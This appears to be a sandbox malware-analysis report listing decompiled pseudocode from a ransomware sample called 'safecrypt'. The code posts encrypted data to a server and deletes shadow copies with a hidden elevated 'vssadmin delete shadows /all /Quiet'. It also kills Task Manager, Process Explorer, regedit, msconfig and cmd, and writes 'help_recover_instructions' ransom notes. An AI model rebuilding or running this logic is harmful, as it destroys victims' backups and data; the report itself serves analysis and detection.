                    					_push(_t137);
                    					_push(0x400);
                    					_push(_t170);
                    					_push(_t97);
                    					L00430286();
                    					_push(_t137);
                    					_push(0x400);
                    					_push(_t170);
                    					_push(_t97);
                    					L00430286();
                    					_push(_t170);
                    					_push(_t97);
                    					_t98 =  *0x43f9dc; // 0x0
                    					_push(0x43ff10);
                    					_push(_v36);
                    					E0041BC10(0x1000,  &_a1128, _t98,  &_a312);
                    					_a8320 = _t137;
                    					E0042C770( &_a8321, _t137, 0xfff);
                    					_t196 =  *0x43fe18; // 0x0
                    					_t206 = _t203 + 0x60;
                    					_a329 = 0;
                    					_a333 = 0;
                    					_a337 = 0;
                    					_a341 = 0;
                    					_a345 = 0;
                    					_a349 = 0;
                    					_a353 = 0;
                    					_a357 = 0;
                    					_a359 = 0;
                    					_t102 = _t196;
                    					_a328 = _t137;
                    					_t33 = _t102 + 1; // 0x1
                    					_t190 = _t33;
                    					do {
                    						_t147 =  *_t102;
                    						_t102 = _t102 + 1;
                    					} while (_t147 != _t137);
                    					E00420970(_t137, _t196,  &_a328, _t102 - _t190);
                    					_push( &_a48);
                    					_push( &_a328);
                    					_a296 = 0xaaaaffff;
                    					_a300 = 0xefbe0000;
                    					_a304 = 0xadde;
                    					_a308 = 0xffffffbe;
                    					E00424020();
                    					_t107 =  &_a1128;
                    					_t208 = _t206 + 0xc;
                    					_t197 = _t107 + 1;
                    					do {
                    						_t150 =  *_t107;
                    						_t107 = _t107 + 1;
                    						_t223 = _t150 - _t137;
                    					} while (_t150 != _t137);
                    					_t151 = _t107 - _t197;
                    					E0042C770(_t208 + _t107 - _t197 + 0x4a1, 0x10, 0x10);
                    					_push( &_a48);
                    					_push( &_a296);
                    					_push( &_a1128);
                    					E0041BF80(_t107 - _t197 + 0x10 - (_t151 + 0x00000001 & 0x0000000f) + 1,  &_a8320);
                    					E0041BC10(0x1000,  &_a1128, "data=%s", E0041B640( &_a8320, _t107 - _t197 + 0x10 - (_t151 + 0x00000001 & 0x0000000f) + 1, _t223,  &_a8320));
                    					E004258B8(_t115);
                    					_t199 = E0041BC30( &_a360, _v32);
                    					_v20 = 0x124f80;
                    					InternetSetOptionA(_t199, 6,  &_v20, 4);
                    					GetLastError();
                    					_t192 = E0041BD40( &_a600, _t199);
                    					_a5208 = _t137;
                    					E0042C770( &_a5209, _t137, 0xc17);
                    					_t124 =  &_a1112;
                    					_t203 = _t208 + 0x40;
                    					_v44 = _t137;
                    					_t158 = _t124 + 1;
                    					do {
                    						_t182 =  *_t124;
                    						_t124 = _t124 + 1;
                    					} while (_t182 != _t137);
                    					_t125 = _t124 - _t158;
                    					_t159 = "Content-Type: application/x-www-form-urlencoded";
                    					_v32 = _t159 + 1;
                    					do {
                    						_t184 =  *_t159;
                    						_t159 = _t159 + 1;
                    					} while (_t184 != _t137);
                    					HttpSendRequestA(_t192, "Content-Type: application/x-www-form-urlencoded", _t159 - _v32,  &_a1112, _t125);
                    					if(GetLastError() != 0) {
                    						L19:
                    						InternetCloseHandle(_t192);
                    						InternetCloseHandle(_t199);
                    						_t188 = _v68;
                    						goto L20;
                    					}
                    					E0041BE60( &_a5188,  &_v64, _t192);
                    					_t132 = _v64;
                    					_t216 = _t203 + 4;
                    					 *(_t216 + _t132 + 0x149c) = _t137;
                    					 *(_t216 + _t132 + 0x14a1) = _t137;
                    					_t133 = strstr( &_a5188, "INSERTED");
                    					_t203 = _t216 + 8;
                    					if(_t133 != 0) {
                    						break;
                    					}
                    					goto L19;
                    					L20:
                    					_t189 =  &(_t188[1]);
                    					_a8 = _t189;
                    				} while (_t189 < 0x4804a8);
                    				InternetCloseHandle(_v0);
                    				if( *0x460a7c == _t137) {
                    					E004258B8(_v8);
                    				}
                    				ExitThread(1);
                    			}













































                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$Internet_alldiv$CrackErrorLastOption_free
                    • String ID: 3.0.0a$<$Content-Type: application/x-www-form-urlencoded$INSERTED$data=%s
                    • API String ID: 1765502259-451914084
                    • Opcode ID: 3ce4e78c82ec1a8f859e741f0438997534b0066702c3e76c079070e1e6b039d9
                    • Instruction ID: bd58787350d36e5a51a4b6c484f588a63d6705a3267ebb551dd0528eaa9203d9
                    • Opcode Fuzzy Hash: 3ce4e78c82ec1a8f859e741f0438997534b0066702c3e76c079070e1e6b039d9
                    • Instruction Fuzzy Hash: 9BB1A5B1508384AFD320DB64EC55EEB77E9AFC9304F44492DF189C7252E7749508CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E0041ED00(void* __ebx) {
                    				signed int _v8;
                    				char _v263;
                    				char _v264;
                    				char _v524;
                    				char _v528;
                    				void* _v532;
                    				intOrPtr _v560;
                    				char* _v568;
                    				char* _v572;
                    				char* _v576;
                    				intOrPtr _v584;
                    				char _v588;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t29;
                    				intOrPtr* _t33;
                    				void* _t47;
                    				intOrPtr* _t50;
                    				void* _t55;
                    				void* _t57;
                    				void* _t70;
                    				void* _t72;
                    				signed int _t74;
                    				void* _t75;
                    				void* _t76;
                    				void* _t78;
                    				void* _t79;
                    
                    				_t57 = __ebx;
                    				_t29 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t29 ^ _t74;
                    				_v264 = 0;
                    				E0042C770( &_v263, 0, 0xff);
                    				_t33 =  *0x480454;
                    				_t76 = _t75 + 0xc;
                    				_v528 = 0;
                    				if(_t33 != 0) {
                    					 *_t33( &_v528);
                    				}
                    				E00425D1D( &_v264, 0x100, "vssa");
                    				E00425D1D( &_v264, 0x100, "dmin");
                    				E00425D1D( &_v264, 0x100, ".exe");
                    				E0042C770( &_v524, 0, 0x104);
                    				E00425D1D( &_v524, 0x104, " delete ");
                    				E00425D1D( &_v524, 0x104, " shadows ");
                    				E00425D1D( &_v524, 0x104, " /all  ");
                    				E00425D1D( &_v524, 0x104, " /Quiet  ");
                    				E0042C770( &_v588, 0, 0x3c);
                    				_t78 = _t76 + 0x6c;
                    				_v588 = 0x3c;
                    				_v576 = "open";
                    				if( *0x480450 == 0) {
                    					_v576 = "runas";
                    				}
                    				_t69 =  &_v264;
                    				_v572 =  &_v264;
                    				_v568 =  &_v524;
                    				_v560 = 0;
                    				_v584 = 0x40;
                    				_t47 = E00420630( &_v588);
                    				_t79 = _t78 + 4;
                    				if(_t47 == 0) {
                    					_push(_t72);
                    					_push(_t70);
                    					while(GetLastError() == 0x4c7) {
                    						Sleep(0x834);
                    						_t69 =  &_v588;
                    						_t55 = E00420630( &_v588);
                    						_t79 = _t79 + 4;
                    						if(_t55 == 0) {
                    							continue;
                    						}
                    						break;
                    					}
                    					_pop(_t70);
                    					_pop(_t72);
                    				}
                    				CloseHandle(_v532);
                    				_t50 =  *0x480458;
                    				if(_t50 != 0) {
                    					 *_t50(_v528);
                    				}
                    				return E004256D3(0, _t57, _v8 ^ _t74, _t69, _t70, _t72);
                    			}































                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strcat_s$_memset$CloseErrorHandleLastSleep
                    • String ID: /Quiet $ /all $ delete $ shadows $.exe$<$@$dmin$open$runas$vssa
                    • API String ID: 3950837021-3701683252
                    • Opcode ID: f3d05da93a31d974641001dee173b8e14cc5aed78445a24418f45c8dafe39de4
                    • Instruction ID: 9c3bf10371f8ed48a855842f2e6262baec1f397de9824df0ef56c7eaf2917f82
                    • Opcode Fuzzy Hash: f3d05da93a31d974641001dee173b8e14cc5aed78445a24418f45c8dafe39de4
                    • Instruction Fuzzy Hash: 4F41EAF5A5031857D720EB61DC89FDE73B89F48704F5045DAB208A7191EBB8AAC4CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 62%
                    			E0042AA4E(void* __ebx) {
                    				void* __edi;
                    				void* __esi;
                    				_Unknown_base(*)()* _t7;
                    				long _t10;
                    				void* _t11;
                    				int _t12;
                    				void* _t14;
                    				void* _t15;
                    				void* _t16;
                    				void* _t18;
                    				intOrPtr _t21;
                    				long _t26;
                    				void* _t30;
                    				struct HINSTANCE__* _t35;
                    				intOrPtr* _t36;
                    				void* _t39;
                    				intOrPtr* _t41;
                    				void* _t42;
                    
                    				_t30 = __ebx;
                    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                    				if(_t35 != 0) {
                    					 *0x43f130 = GetProcAddress(_t35, "FlsAlloc");
                    					 *0x43f134 = GetProcAddress(_t35, "FlsGetValue");
                    					 *0x43f138 = GetProcAddress(_t35, "FlsSetValue");
                    					_t7 = GetProcAddress(_t35, "FlsFree");
                    					__eflags =  *0x43f130;
                    					_t39 = TlsSetValue;
                    					 *0x43f13c = _t7;
                    					if( *0x43f130 == 0) {
                    						L6:
                    						 *0x43f134 = TlsGetValue;
                    						 *0x43f130 = E0042A75E;
                    						 *0x43f138 = _t39;
                    						 *0x43f13c = TlsFree;
                    					} else {
                    						__eflags =  *0x43f134;
                    						if( *0x43f134 == 0) {
                    							goto L6;
                    						} else {
                    							__eflags =  *0x43f138;
                    							if( *0x43f138 == 0) {
                    								goto L6;
                    							} else {
                    								__eflags = _t7;
                    								if(_t7 == 0) {
                    									goto L6;
                    								}
                    							}
                    						}
                    					}
                    					_t10 = TlsAlloc();
                    					 *0x43db90 = _t10;
                    					__eflags = _t10 - 0xffffffff;
                    					if(_t10 == 0xffffffff) {
                    						L15:
                    						_t11 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t12 = TlsSetValue(_t10,  *0x43f134);
                    						__eflags = _t12;
                    						if(_t12 == 0) {
                    							goto L15;
                    						} else {
                    							E00428614();
                    							_t41 = __imp__EncodePointer;
                    							_t14 =  *_t41( *0x43f130);
                    							 *0x43f130 = _t14;
                    							_t15 =  *_t41( *0x43f134);
                    							 *0x43f134 = _t15;
                    							_t16 =  *_t41( *0x43f138);
                    							 *0x43f138 = _t16;
                    							 *0x43f13c =  *_t41( *0x43f13c);
                    							_t18 = E0042CBD5();
                    							__eflags = _t18;
                    							if(_t18 == 0) {
                    								L14:
                    								E0042A79B();
                    								goto L15;
                    							} else {
                    								_t36 = __imp__DecodePointer;
                    								_t21 =  *((intOrPtr*)( *_t36()))( *0x43f130, E0042A91F);
                    								 *0x43db8c = _t21;
                    								__eflags = _t21 - 0xffffffff;
                    								if(_t21 == 0xffffffff) {
                    									goto L14;
                    								} else {
                    									_t42 = E0042C852(1, 0x214);
                    									__eflags = _t42;
                    									if(_t42 == 0) {
                    										goto L14;
                    									} else {
                    										__eflags =  *((intOrPtr*)( *_t36()))( *0x43f138,  *0x43db8c, _t42);
                    										if(__eflags == 0) {
                    											goto L14;
                    										} else {
                    											_push(0);
                    											_push(_t42);
                    											E0042A7D8(_t30, _t36, _t42, __eflags);
                    											_t26 = GetCurrentThreadId();
                    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                    											 *_t42 = _t26;
                    											_t11 = 1;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    					return _t11;
                    				} else {
                    					E0042A79B();
                    					return 0;
                    				}
                    			}






















                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00426802), ref: 0042AA56
                    • __mtterm.LIBCMT ref: 0042AA62
                      • Part of subcall function 0042A79B: DecodePointer.KERNEL32(00000005,0042ABC4,?,00426802), ref: 0042A7AC
                      • Part of subcall function 0042A79B: TlsFree.KERNEL32(0000001A,0042ABC4,?,00426802), ref: 0042A7C6
                      • Part of subcall function 0042A79B: DeleteCriticalSection.KERNEL32(00000000,00000000,77E4F3A0,?,0042ABC4,?,00426802), ref: 0042CC3C
                      • Part of subcall function 0042A79B: _free.LIBCMT ref: 0042CC3F
                      • Part of subcall function 0042A79B: DeleteCriticalSection.KERNEL32(0000001A,77E4F3A0,?,0042ABC4,?,00426802), ref: 0042CC66
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042AA78
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042AA85
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042AA92
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042AA9F
                    • TlsAlloc.KERNEL32(?,00426802), ref: 0042AAEF
                    • TlsSetValue.KERNEL32(00000000,?,00426802), ref: 0042AB0A
                    • __init_pointers.LIBCMT ref: 0042AB14
                    • EncodePointer.KERNEL32(?,00426802), ref: 0042AB25
                    • EncodePointer.KERNEL32(?,00426802), ref: 0042AB32
                    • EncodePointer.KERNEL32(?,00426802), ref: 0042AB3F
                    • EncodePointer.KERNEL32(?,00426802), ref: 0042AB4C
                    • DecodePointer.KERNEL32(0042A91F,?,00426802), ref: 0042AB6D
                    • __calloc_crt.LIBCMT ref: 0042AB82
                    • DecodePointer.KERNEL32(00000000,?,00426802), ref: 0042AB9C
                    • GetCurrentThreadId.KERNEL32 ref: 0042ABAE
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                    • API String ID: 3698121176-3819984048
                    • Opcode ID: 6402222f931019e0a263305b7d64955ff0529ccb091b6faf6840f6ff57d3bf8d
                    • Instruction ID: 63451e9ee2372d0d2f6e36bcbba75019223a06b5d1391e550d8909eb6168422a
                    • Opcode Fuzzy Hash: 6402222f931019e0a263305b7d64955ff0529ccb091b6faf6840f6ff57d3bf8d
                    • Instruction Fuzzy Hash: 25315B31E01220DBCF11AB75FE48A0E3EA1AB45324F54253BEA90C32B0DB789856DE5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 63%
                    			E00420200(void* __ebx, void* __edi, void* __esi) {
                    				signed int _v8;
                    				char _v8198;
                    				long _v8200;
                    				char _v88200;
                    				unsigned int _v88204;
                    				long _v88208;
                    				unsigned int _v88212;
                    				signed int _t28;
                    				char* _t37;
                    				unsigned int _t39;
                    				intOrPtr* _t42;
                    				intOrPtr* _t44;
                    				intOrPtr* _t47;
                    				wchar_t* _t52;
                    				intOrPtr* _t53;
                    				wchar_t* _t55;
                    				wchar_t* _t57;
                    				wchar_t* _t58;
                    				wchar_t* _t59;
                    				signed int _t61;
                    				intOrPtr _t66;
                    				intOrPtr _t74;
                    				void* _t75;
                    				signed int _t76;
                    				void* _t77;
                    				void* _t78;
                    				void* _t80;
                    				void* _t81;
                    
                    				_t73 = __esi;
                    				_t71 = __edi;
                    				_t60 = __ebx;
                    				E0042DFB0(0x15894);
                    				_t28 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t28 ^ _t76;
                    				_v8200 = 0;
                    				E0042C770( &_v8198, 0, 0x1ffe);
                    				_t78 = _t77 + 0xc;
                    				_v88208 = GetCurrentProcessId();
                    				if( *0x46844c != 0) {
                    					_push(__ebx);
                    					_push(__esi);
                    					_push(__edi);
                    					do {
                    						_t69 =  &_v88212;
                    						_t37 =  &_v88200;
                    						__imp__EnumProcesses(_t37, 0x9c40,  &_v88212);
                    						if(_t37 != 0) {
                    							_t39 = _v88212 >> 2;
                    							_t61 = 0;
                    							_v88204 = _t39;
                    							if(_t39 != 0) {
                    								do {
                    									_t74 =  *((intOrPtr*)(_t76 + _t61 * 4 - 0x15884));
                    									if(_t74 != _v88208 && _t74 != 0) {
                    										_t42 = E00412FC0(_t69, 0, 1, 0x99a4299d);
                    										_t80 = _t78 + 0xc;
                    										_t75 =  *_t42(0x2000030, 0, _t74);
                    										if(_t75 == 0) {
                    											L17:
                    											_t44 = E00412FC0(_t69, 0, 1, 0x723eb0d5);
                    											_t78 = _t80 + 0xc;
                    											 *_t44(_t75);
                    										} else {
                    											E0042C770( &_v8200, 0, 0x2000);
                    											_t78 = _t80 + 0xc;
                    											__imp__GetProcessImageFileNameW(_t75,  &_v8200, 0x1000);
                    											_t47 =  &_v8200;
                    											_t69 = _t47 + 2;
                    											do {
                    												_t66 =  *_t47;
                    												_t47 = _t47 + 2;
                    											} while (_t66 != 0);
                    											if(_t47 != _t69) {
                    												E00426123( &_v8200, 0x1000);
                    												_t52 = wcsstr( &_v8200, L"askmg");
                    												_t81 = _t78 + 0x10;
                    												if(_t52 != 0) {
                    													L16:
                    													_t53 = E00412FC0(_t69, 0, 1, 0x9e6fa842);
                    													_t80 = _t81 + 0xc;
                    													 *_t53(_t75, 0);
                    												} else {
                    													_t69 =  &_v8200;
                    													_t55 = wcsstr( &_v8200, L"rocex");
                    													_t81 = _t81 + 8;
                    													if(_t55 != 0) {
                    														goto L16;
                    													} else {
                    														_t57 = wcsstr( &_v8200, L"egedi");
                    														_t81 = _t81 + 8;
                    														if(_t57 != 0) {
                    															goto L16;
                    														} else {
                    															_t58 = wcsstr( &_v8200, L"sconfi");
                    															_t81 = _t81 + 8;
                    															if(_t58 != 0) {
                    																goto L16;
                    															} else {
                    																_t69 =  &_v8200;
                    																_t59 = wcsstr( &_v8200, L"cmd");
                    																_t80 = _t81 + 8;
                    																if(_t59 != 0) {
                    																	goto L16;
                    																}
                    															}
                    														}
                    													}
                    												}
                    												goto L17;
                    											}
                    										}
                    										_t39 = _v88204;
                    									}
                    									_t61 = _t61 + 1;
                    								} while (_t61 < _t39);
                    							}
                    							E0042C770( &_v88200, 0, 0x13880);
                    							_t78 = _t78 + 0xc;
                    							Sleep(0xc8);
                    						}
                    					} while ( *0x46844c != 0);
                    					_pop(_t71);
                    					_pop(_t73);
                    					_pop(_t60);
                    				}
                    				 *((intOrPtr*)(E00412FC0(_t69, 0, 1, 0x768aa260)))();
                    				return E004256D3(1, _t60, _v8 ^ _t76, _t69, _t71, _t73, 0xffffffff);
                    			}
































                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: wcsstr$_memset$Process$CurrentEnumFileImageNameProcessesSleep
                    • String ID: askmg$cmd$egedi$rocex$sconfi
                    • API String ID: 2052185934-3583037101
                    • Opcode ID: ebe720161988235cf71c7f045c81fe5bb202f5c7562bae19e687f92eea85bc0b
                    • Instruction ID: b262025a8f7409b4f4b3e07e9675985a98886e9c244c715278cdc869f55fabf0
                    • Opcode Fuzzy Hash: ebe720161988235cf71c7f045c81fe5bb202f5c7562bae19e687f92eea85bc0b
                    • Instruction Fuzzy Hash: E251E131B40325ABDB24E755AD85FDB73A4DF44705F840056FA04FA182EBB49A44CE6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E004134E0(wchar_t* _a4) {
                    				signed int _v8;
                    				char _v8198;
                    				short _v8200;
                    				long _v8204;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t26;
                    				wchar_t* _t32;
                    				intOrPtr* _t40;
                    				intOrPtr* _t43;
                    				wchar_t* _t50;
                    				intOrPtr* _t52;
                    				intOrPtr* _t55;
                    				intOrPtr* _t56;
                    				long _t57;
                    				intOrPtr _t60;
                    				intOrPtr _t61;
                    				void* _t64;
                    				void* _t65;
                    				void* _t69;
                    				void* _t71;
                    				void* _t73;
                    				void* _t74;
                    				signed int _t75;
                    				void* _t76;
                    				void* _t77;
                    				void* _t78;
                    				void* _t79;
                    
                    				E0042DFB0(0x2008);
                    				_t26 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t26 ^ _t75;
                    				_t50 = _a4;
                    				_v8204 = 0;
                    				_v8200 = 0;
                    				E0042C770( &_v8198, 0, 0x1ffe);
                    				_t77 = _t76 + 0xc;
                    				_t52 = 0x474450;
                    				_t30 = _t50;
                    				while(1) {
                    					_t62 =  *_t30;
                    					if(_t62 !=  *_t52) {
                    						break;
                    					}
                    					if(_t62 == 0) {
                    						L5:
                    						_t30 = 0;
                    					} else {
                    						_t62 = _t30[0];
                    						if(_t62 !=  *((intOrPtr*)(_t52 + 2))) {
                    							break;
                    						} else {
                    							_t30 =  &(_t30[1]);
                    							_t52 = _t52 + 4;
                    							if(_t62 != 0) {
                    								continue;
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    					L7:
                    					if(_t30 != 0) {
                    						_t55 = 0x46e450;
                    						_t30 = _t50;
                    						while(1) {
                    							_t62 =  *_t30;
                    							if(_t62 !=  *_t55) {
                    								break;
                    							}
                    							if(_t62 == 0) {
                    								L13:
                    								_t30 = 0;
                    							} else {
                    								_t62 = _t30[0];
                    								if(_t62 !=  *((intOrPtr*)(_t55 + 2))) {
                    									break;
                    								} else {
                    									_t30 =  &(_t30[1]);
                    									_t55 = _t55 + 4;
                    									if(_t62 != 0) {
                    										continue;
                    									} else {
                    										goto L13;
                    									}
                    								}
                    							}
                    							L15:
                    							if(_t30 != 0) {
                    								_t56 = 0x47c450;
                    								_t30 = _t50;
                    								while(1) {
                    									_t62 =  *_t30;
                    									if(_t62 !=  *_t56) {
                    										break;
                    									}
                    									if(_t62 == 0) {
                    										L21:
                    										_t30 = 0;
                    									} else {
                    										_t62 = _t30[0];
                    										if(_t62 !=  *((intOrPtr*)(_t56 + 2))) {
                    											break;
                    										} else {
                    											_t30 =  &(_t30[1]);
                    											_t56 = _t56 + 4;
                    											if(_t62 != 0) {
                    												continue;
                    											} else {
                    												goto L21;
                    											}
                    										}
                    									}
                    									L23:
                    									if(_t30 != 0) {
                    										_push(_t71);
                    										_t30 = wcsstr(_t50, 0x470450);
                    										_t78 = _t77 + 8;
                    										if(_t30 == 0) {
                    											_t32 = 0x472450;
                    											_t12 =  &(_t32[0]); // 0x472452
                    											_t62 = _t12;
                    											do {
                    												_t57 =  *_t32;
                    												_t32 =  &(_t32[0]);
                    											} while (_t57 != 0);
                    											if(_t32 == _t62) {
                    												L29:
                    												if( *0x480484 != 0) {
                    													_push(0x4401f8);
                    													_push(L"help_recover_instructions");
                    													E00414320(0x1000,  &_v8200, L"%s\\%s+%s.png", _t50);
                    													_t78 = _t78 + 0x14;
                    													E004134B0( &_v8200);
                    												}
                    												_push(_t69);
                    												_push(0x4401f8);
                    												_push(L"help_recover_instructions");
                    												E00414320(0x1000,  &_v8200, L"%s\\%s+%s.txt", _t50);
                    												_t73 = E00413480( &_v8200);
                    												_t79 = _t78 + 0x18;
                    												if(_t73 != 0xffffffff) {
                    													_t43 = 0x460b30;
                    													_t17 = _t43 + 1; // 0x460b31
                    													_t65 = _t17;
                    													do {
                    														_t61 =  *_t43;
                    														_t43 = _t43 + 1;
                    													} while (_t61 != 0);
                    													E00414340( &_v8204, _t73, 0x460b30, _t43 - _t65,  &_v8204);
                    													_t79 = _t79 + 0x10;
                    													CloseHandle(_t73);
                    												}
                    												_push(0x4401f8);
                    												_push(L"help_recover_instructions");
                    												_t62 = 0x1000;
                    												E00414320(0x1000,  &_v8200, L"%s\\%s+%s.html", _t50);
                    												_t74 = CreateFileW( &_v8200, 0x40000000, 0, 0, 4, 0x80, 0);
                    												if(_t74 != 0xffffffff) {
                    													_t40 = 0x4647c0;
                    													_t21 = _t40 + 1; // 0x4647c1
                    													_t64 = _t21;
                    													do {
                    														_t60 =  *_t40;
                    														_t40 = _t40 + 1;
                    													} while (_t60 != 0);
                    													_t62 =  &_v8204;
                    													E00414340( &_v8204, _t74, 0x4647c0, _t40 - _t64,  &_v8204);
                    													_t30 = CloseHandle(_t74);
                    												}
                    												_pop(_t69);
                    											} else {
                    												_t30 = wcsstr(_t50, 0x472450);
                    												_t78 = _t78 + 8;
                    												if(_t30 == 0) {
                    													goto L29;
                    												}
                    											}
                    										}
                    										_pop(_t71);
                    									}
                    									goto L41;
                    								}
                    								asm("sbb eax, eax");
                    								asm("sbb eax, 0xffffffff");
                    								goto L23;
                    							}
                    							goto L41;
                    						}
                    						asm("sbb eax, eax");
                    						asm("sbb eax, 0xffffffff");
                    						goto L15;
                    					}
                    					L41:
                    					return E004256D3(_t30, _t50, _v8 ^ _t75, _t62, _t69, _t71);
                    				}
                    				asm("sbb eax, eax");
                    				asm("sbb eax, 0xffffffff");
                    				goto L7;
                    			}

































                    APIs
                    • _memset.LIBCMT ref: 0041351B
                    • wcsstr.NTDLL ref: 004135F0
                    • wcsstr.NTDLL ref: 0041361C
                    • CloseHandle.KERNEL32(00000000), ref: 004136C7
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 00413706
                    • CloseHandle.KERNEL32(00000000), ref: 00413740
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandlewcsstr$CreateFile_memset
                    • String ID: %s\%s+%s.html$%s\%s+%s.png$%s\%s+%s.txt$P$G$PDG$PF$help_recover_instructions$help_recover_instructions$help_recover_instructions
                    • API String ID: 462951343-2042322709
                    • Opcode ID: 9073024c6124a845a995ef6d7def1e9ade7c062f9b95042c709359cd1dc3f6b2
                    • Instruction ID: 7db934ea3d0fd8ebc52644ab37a3ef20c6a7f9294e6458d63ca7fe416887fef5
                    • Opcode Fuzzy Hash: 9073024c6124a845a995ef6d7def1e9ade7c062f9b95042c709359cd1dc3f6b2
                    • Instruction Fuzzy Hash: B3517BB160020176E7109F24CC86BE733669F64B19F5482A7E919A73C5F779EF84C26C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 65%
                    			E00401230(void* __ebx) {
                    				signed int _v8;
                    				char _v54;
                    				char _v56;
                    				void* _v60;
                    				int _v64;
                    				int _v68;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t25;
                    				long _t29;
                    				intOrPtr _t43;
                    				intOrPtr* _t44;
                    				signed int _t94;
                    				void* _t95;
                    				void* _t96;
                    
                    				_t61 = __ebx;
                    				_t25 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t25 ^ _t94;
                    				_v60 = 0;
                    				_v64 = 8;
                    				_v56 = 0;
                    				E0042C770( &_v54, 0, 0x2e);
                    				_t93 = RegCreateKeyExW;
                    				_t96 = _t95 + 0xc;
                    				_t29 = RegCreateKeyExW(0x80000003, L"\\S-1-5-18\\Software\\xxxsys\\", 0, 0, 0, 0x20019, 0,  &_v60, 0);
                    				_t92 = RegQueryValueExW;
                    				if(_t29 != 0 || RegQueryValueExW(_v60, L"ID", 0,  &_v68, 0x43fed8,  &_v64) != 0) {
                    					RegCreateKeyExW(0x80000001, L"Software\\xxxsys\\", 0, 0, 0, 0x2001f, 0,  &_v60, 0);
                    					if(RegQueryValueExW(_v60, L"ID", 0,  &_v68, 0x43fed8,  &_v64) != 0) {
                    						_t43 =  *0x460aa8;
                    						if(_t43 == 0) {
                    							_t43 = 0x43e45c;
                    							 *0x460aa8 = 0x43e45c;
                    						}
                    						_t18 = _t43 + 4; // 0x41cb60
                    						_t44 =  *_t18;
                    						if(_t44 != 0) {
                    							 *_t44(0x43fed8, 8);
                    							_t96 = _t96 + 8;
                    						}
                    						RegSetValueExW(_v60, L"ID", 0, 3, 0x43fed8, 8);
                    						RegFlushKey(_v60);
                    					}
                    					_push( *0x43fedb & 0x000000ff);
                    					_push( *0x43feda & 0x000000ff);
                    					_push( *0x43fed9 & 0x000000ff);
                    					E00401CD0(0x18, 0x43fee0, L"%X%X%X%X",  *0x43fed8 & 0x000000ff);
                    					_push( *0x43fedf & 0x000000ff);
                    					_push( *0x43fede & 0x000000ff);
                    					E00401CD0(0x18,  &_v56, L"%X%X%X%X",  *0x43fedc & 0x000000ff);
                    					E00425AA2(0x43fee0, 0x18,  &_v56);
                    					RegCloseKey(_v60);
                    					return E004256D3(0, _t61, _v8 ^ _t94,  &_v56, _t92, _t93,  *0x43fedd & 0x000000ff);
                    				} else {
                    					_push( *0x43fedb & 0x000000ff);
                    					_push( *0x43feda & 0x000000ff);
                    					_push( *0x43fed9 & 0x000000ff);
                    					E00401CD0(0x18, 0x43fee0, L"%X%X%X%X",  *0x43fed8 & 0x000000ff);
                    					_push( *0x43fedf & 0x000000ff);
                    					_push( *0x43fede & 0x000000ff);
                    					E00401CD0(0x18,  &_v56, L"%X%X%X%X",  *0x43fedc & 0x000000ff);
                    					E00425AA2(0x43fee0, 0x18,  &_v56);
                    					RegCloseKey(_v60);
                    					return E004256D3(1, __ebx, _v8 ^ _t94, 0x18, RegQueryValueExW, RegCreateKeyExW,  *0x43fedd & 0x000000ff);
                    				}
                    			}



















                    APIs
